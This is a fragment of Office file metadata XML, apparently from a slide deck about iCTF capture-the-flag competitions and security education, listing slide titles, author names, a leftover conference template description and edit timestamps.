      <vt:lpstr>iCTF CyberWar Competition Experiences </vt:lpstr>
      <vt:lpstr>iCTF Puzzles</vt:lpstr>
      <vt:lpstr>iCTF puzzles</vt:lpstr>
      <vt:lpstr>iCTF 2011 and related Cyber Events</vt:lpstr>
      <vt:lpstr>Unique Security Education Programs</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager>Speech writer name here</Manager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subject>Professional Developers Conference</dc:subject>
  <dc:creator>Rudolph Balaz</dc:creator>
  <dc:description>Formatter:_x000d_
Event Date: Sept. 13-16, 2005_x000d_
Event Location:_x000d_
Speech Length:_x000d_
Audience: Professional Developers, TDMs_x000d_
Key Topics:</dc:description>
  <cp:lastModifiedBy>Edward Chow</cp:lastModifiedBy>
  <cp:revision>323</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-22T14:11:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-15T17:13:49Z</dcterms:modified>
</cp:coreProperties>
</file>